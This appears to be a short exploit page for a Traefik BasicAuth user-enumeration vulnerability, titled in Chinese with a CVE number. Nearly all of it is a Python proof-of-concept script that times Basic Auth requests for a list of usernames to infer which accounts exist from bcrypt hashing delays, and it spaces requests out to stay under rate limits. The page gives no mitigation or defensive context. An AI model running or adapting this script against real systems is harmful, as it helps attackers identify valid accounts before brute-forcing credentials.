CVE-2026-41263 Traefik BasicAuth用户枚举漏洞

import requests import time import base64 # Target URL (Replace with actual target) TARGET_URL = "http://localhost:8080/protected" def check_username_timing(username): """ Checks if a username exists by measuring the response time. Shorter time usually indicates the user does not exist (short-circuit). Longer time indicates the user exists (bcrypt hash calculation). """ # Create a dummy password, we only care about the username existence credentials = f"{username}:dummy_password" b64_credentials = base64.b64encode(credentials.encode()).decode() headers = { "Authorization": f"Basic {b64_credentials}" } start_time = time.time() try: # Send request, we expect 401 Unauthorized, but the timing varies response = requests.get(TARGET_URL, headers=headers, timeout=5) except requests.RequestException as e: print(f"Error connecting: {e}") return None end_time = time.time() return end_time - start_time if __name__ == "__main__": # List of potential usernames to brute-force usernames = ["admin", "user", "test", "root", "nonexistent_user_123"] iterations = 10 # Number of requests to average out network jitter print(f"{'Username':<20} | {'Avg Time (s)':<15} | {'Status'}") print("-" * 50) for user in usernames: total_time = 0 for _ in range(iterations): duration = check_username_timing(user) if duration: total_time += duration time.sleep(0.1) # Small delay to avoid triggering rate limits immediately avg_duration = total_time / iterations if total_time > 0 else 0 # This threshold depends on network latency and server hardware. # Statistical analysis (e.g., t-test) is better for production. # Here we assume > 0.05s difference is significant for example. status = "LIKELY EXISTS" if avg_duration > 0.05 else "LIKELY DOESN'T EXIST" print(f"{user:<20} | {avg_duration:.6f} | {status}")